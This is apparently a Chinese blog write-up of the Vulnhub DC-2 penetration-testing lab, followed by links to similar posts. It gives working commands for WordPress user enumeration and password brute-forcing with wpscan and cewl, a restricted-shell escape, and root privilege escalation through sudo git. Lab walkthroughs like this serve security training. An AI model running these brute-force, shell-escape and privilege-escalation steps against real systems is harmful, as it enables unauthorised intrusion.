靶场下载链接:

Download: http://www.five86.com/downloads/DC-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent ( Magnet)
 
首先获取目标主机ip
netdiscover -i eth0 -r 192.168.88.1/24
对端口进行扫描,只开放了web服务
于是访问web
这里配置本地dns解析,将目标ip地址添加进hosts
成功访问,发现是wordpress。
 
此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。
先使用dirb 做一个简单的目录扫描
发现后台地址
发现多个遍历,但是没有可以下载的东西没什么用
 
首先来个用户枚举,再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 -e u 枚举出三个用户名
使用rockyou.txt 生成一个dc2.txt 的字典。同时利用枚举出的用户也生成一个密码字典。
接下来就是密码爆破了。
wpscan --url http://dc-2 --passwords /usr/share/wordlists/dc2.txt --usernames /root/dc2.txt
这个字典有点大也没有针对性。
刚才提示的是让我们利用 cewl 生成字典啊,那我们需要利用爬取网站的关键字重新生成字典。
cewl dc-2 > dc-2.txt
继续爆破
wpscan --url http://dc-2 --passwords /root/dc-2.txt --usernames /root/dc2.txt
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
登录后台,又有提示信息
扫描全端口
nmap -sS -p- 192.168.88.189
进一步探测,找到一个ssh
nmap -sV -p 7744 dc-2
尝试使用之前爆破的用户名密码登录ssh
jerry 登录失败,但是tom 成功登录了………
使用tom登录后rbash限制,各种命令执行不通!!!
尝试绕过暂时没找到绕过方法,但是vi 可以使用,暂且使用 vi 查看flag3.TXT 内容。
大概意思是提示我们切换jerry账户
 
关于rbash 绕过可以参考以下两篇文章:
但是这并没有解决我的问题!
 
以下方法成功绕过 rbash 限制
rbash 限制绕过(又差点猝死!!!)
1.r意味着restrict
2.使用BASH_CMDS[a]=/bin/sh;a
3.
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
4. echo /*查看文件
切换 到 jerry ,在jerry 家目录下找到第四个flag
flag4 提示我们可以使用git,我们可以通过git来提权
sudo -l 我们可以看到无需root权限,jerry 可以使用 git !
我们可以利用suid 进行提权
SUID可以让调用者以文件拥有者的身份运行该文件
已知可用来提权的linux文件: Nmap Vim find Bash More Less Nano
查找系统上运行的所有SUID可执行文件。
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
 
输入sudo git -p --help
输入!/bin/bash 获得root权限,并且在root目录下找到最后一个flag!!!
 
我似乎在这条道路上有着用不完的激情
接下来的日子里,生死未卜~

DC-2靶机渗透的更多相关文章

  1. DC 1-3 靶机渗透

    DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...

  2. vulnhub-DC:2靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  3. vulnhub-DC:1靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  4. vulnhub-DC:3靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...

  5. vulnhub-DC:4靶机渗透记录

    准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...

  6. vulnhub-DC:5靶机渗透记录

    准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  7. vulnhub-DC:6靶机渗透记录

    准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  8. vulnhub-DC:7靶机渗透记录

    准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...

  9. DC-1 靶机渗透测试

    DC-1靶机渗透测试 对着镜子大喊三声"太菜了""太菜了""太菜了" DC系列靶机的第一篇.边学习边日靶机边进步,摸爬滚打着前行. 内容不只 ...

  10. vulnhub-DC:8靶机渗透记录

    准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

随机推荐

  1. 【动态规划法(DP)】-C++

    360百科定义: 动态规划(dynamic programming)是运筹学的一个分支,是求解决策过程(decision process)最优化的数学方法.20世纪50年代初美国数学家R.E.Bell ...

  2. py+appium微信公众号自动化(已搞定多个坑)

    最近需要做微信公众号的自动化测试,遇到了不少坑. 微信公众号自动化与app自动化还是有区别的,因为多了不少坑.打开微信x5内核调试的就不说了,百度有. 1.首先,微信公众号有webview,uiaut ...

  3. Eclipse引入DTD文件

    首先,去MyBatis官方网站下载dtd文件.(本篇本章只演示如何引入config.dtd文件,mapper.dtd同操作) 打开Eclipse,选择Window下面的Preferences选项. 左 ...

  4. 怎样在自己的网页中调用百度API

    https://blog.csdn.net/u010251278/article/details/52877370 以下内容转自上述网站,为了以后的学习方便,为此才特地将该网站内容转到自己的博客,多谢 ...

  5. MySQL 5.7和8.0性能测试

    目录 背景 前提 环境 测试 双1模式下 0 2 模式下 结论 背景 测试mysql5.7和mysql8.0 分别在读写.只读.只写模式下不同并发时的性能(tps,qps) 前提 测试使用版本为mys ...

  6. X-Admin&ABP框架开发-消息通知

    业务型网站使用过程中,消息通知是一个不可或缺的功能,采用站内通知.短信通知.邮件通知.微信通知等等各种方式都有,ABP框架对这部分工作已经封装的很好了,站在巨人的肩膀上,一览全貌,带来的就是心情舒畅. ...

  7. 《Scalable IO in Java》译文

    <Scalable IO in Java> 是java.util.concurrent包的作者,大师Doug Lea关于分析与构建可伸缩的高性能IO服务的一篇经典文章,在文章中Doug L ...

  8. 基础算法和数据结构高频题 II

    DFS的两种理解方式:1. 按照实际执行顺序模拟 (适合枚举型DFS,下节课内容)2. 按照DFS的定义宏观理解 (适合分治型DFS,本节课内容) 1 Convert BST to Greater T ...

  9. python3键盘输入

    1.脚本 # -*- coding: utf-8 -*- print("今年是哪一年?"),year = input("年份:")print ("ji ...

  10. STL 大法好

    #include <vector>  1.支持随机访问,但不支持在任意位置O(1)插入:    2.定义:  ```cpp      vector<int> a;  ```  ...